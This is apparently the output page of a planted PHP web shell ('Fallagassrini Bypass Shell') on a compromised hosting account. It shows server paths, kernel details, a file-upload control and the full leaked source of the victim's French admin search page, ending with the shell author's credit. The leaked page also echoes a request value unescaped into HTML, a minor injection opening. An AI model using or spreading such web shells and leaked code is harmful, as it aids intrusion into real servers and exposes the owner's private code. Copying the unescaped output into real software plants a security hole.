Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/happyrenas/myreco.online/administration/panel/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/happyrenas/myreco.online/administration/panel/public.php

<?
set_include_path(get_include_path() . PATH_SEPARATOR . __DIR__ . '/../');
include("../../configuration.php");
include("../../includes/fonctions.php");
setlocale(LC_TIME, 'fr_FR.UTF-8');


include("auth.php");
$page="public";
	

///////////////////////
//PARAMETRES DE LA PAGE
///////////////////////
$totem					= "index";
$ariane1				= "Accueil";
$titre					= "index";
$datatable_nom			= "philippelien";
$ariane2				= "";

///////////////////////
//RECUPERATION ET TRAITEMENT
///////////////////////


$laville 					= trim($db->escape($_REQUEST['laville']));

$lepays 					= trim($db->escape($_REQUEST['lepays']));

?>
<!DOCTYPE html>
<html lang="fr">
	<?include("includes/head.php");?>
	<body id="kt_body" class="page-loading-enabled page-loading header-fixed header-mobile-fixed subheader-enabled subheader-fixed aside-enabled aside-fixed page-loading">
	<div id="halt_loader_overlay"></div><div id="halt_loader" class=""><i class="fa fa-spinner fa-spin"></i> Chargement des informations, merci de patienter...</div>
		<div class="d-flex flex-column flex-root">
			<!--begin::Page-->
			<div class="d-flex flex-row flex-column-fluid page">
				<?include("includes/header_left.php");?>
				<!--begin::Wrapper-->
				<div class="d-flex flex-column flex-row-fluid wrapper" id="kt_wrapper">
					<?include("includes/header_top.php");?>
					<!--begin::Content-->
					<br>
					<div class="content d-flex flex-column flex-column-fluid" id="kt_content">
						<!--begin::Subheader-->
						<div class="subheader py-2 py-lg-4 subheader-solid" id="kt_subheader">
							<div class="container-fluid d-flex align-items-center justify-content-between flex-wrap flex-sm-nowrap">
								<div class="d-flex align-items-center flex-wrap mr-2">
									<h5 class="text-dark font-weight-bold mt-2 mb-2 mr-5"><?echo $ariane1;?></h5>
									<div class="subheader-separator subheader-separator-ver mt-2 mb-2 mr-5 bg-gray-200"></div>
									<div class="d-flex align-items-center" id="kt_subheader_search">
										<span class="text-dark-50 font-weight-bold" id="kt_subheader_total"><?echo $ariane2;?></span>
									</div>
								</div>
							</div>
						</div>
						<?
						if ($laville && $lepays) {
							$resultats = $db->get_results("
							  SELECT city, country_code 
							  FROM heb_villes 
							  WHERE city = '$laville' 
							  AND country_code = '$lepays' 
							  ORDER BY city ASC 
							  LIMIT 20
							");
						}?>
						

						<!--end::Subheader-->
						<div class="d-flex flex-column-fluid">
							
							<div class="<?echo $container_type;?>">
							
															
								
								
								<form id="formulaire_principal" action="public.php" method="post">
								<div class="row">
									<div class="col-6">
										<div class="card card-custom gutter-b" style="border: 1px solid <?echo $couleur_bordure;?>;">
											<div class="card-header flex-wrap py-3">
												<div class="card-title">
													<h3 class="card-label">Accès public</h3>
												</div>
												<div class="card-toolbar" id="card-toolbar">
													<div class="btn-group ml-2"><button type="submit" form="formulaire_principal" id="formulaire_principal" class="form_bouton btn btn-primary font-weight-bold btn-sm px-3 font-size-base" onclick="showLoader();">CHERCHER</button></div>
												</div>
											</div>
											
											<div class="card-body">
												<div class="form-group">
													<label>Ville <span class="text-danger">*</span></label>
													<div class="input-group">
														<input  type="text" name="laville" class="form-control"  placeholder="Ville" value="<?echo htmlspecialchars($laville);?>" required>
													</div>
												</div>
												<div class="form-group">
													<label>Pays</label>
													<div class="input-group">
														<select class="form-control" id="lepays" name="lepays">
															<?php foreach ($pays as $code => $info) { ?>
															<option value="<?php echo $code; ?>"><?php echo $code; ?></option>
															<?php } ?>
														</select>
													</div>
												</div>
											</div>
										</div>
															
									</div>
									<div class="col-6">
										<?php if (!empty($resultats)) { ?>
											<div class="mt-4">
												<h5>Résultats :</h5>
												<ul class="list-group">
													<?php foreach ($resultats as $ville) {
														$ville_param = urlencode($laville . ', ' . strtoupper($lepays));
														$url = "https://www.myreco.online/hebergement_resultat.php?ville=$ville_param";

														?>
														<li class="list-group-item d-flex justify-content-between align-items-center">
															<a href="<?echo $url;?>"><?php echo htmlspecialchars($ville->city); ?></a>
															<span class="badge badge-light"><?php echo $ville->country_code; ?></span>
														</li>
													<?php } ?>
												</ul>
											</div>
										<?php } elseif ($laville && $lepays) { ?>
											<div class="alert alert-warning mt-4">Aucune ville trouvée pour <strong><?php echo htmlspecialchars($laville); ?></strong> (<?php echo $lepays; ?>).</div>
										<?php } ?>
									</div>





								</div>
								</form>
									
							
							
							
						</div>	
							
						</div>
						
						<!--end::Content-->
					</div>
					<!--begin::Footer-->
					<?include("includes/footer.php");?>
					<!--end::Footer-->
				</div>
				<!--end::Wrapper-->
			</div>
			<!--end::Page-->
		</div>
		<!--end::Main-->
		<?include("includes/extrav2.php");?>
		
		
    
		
		<?include("includes/end.php");?>

	</body>
	<!--end::Body-->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net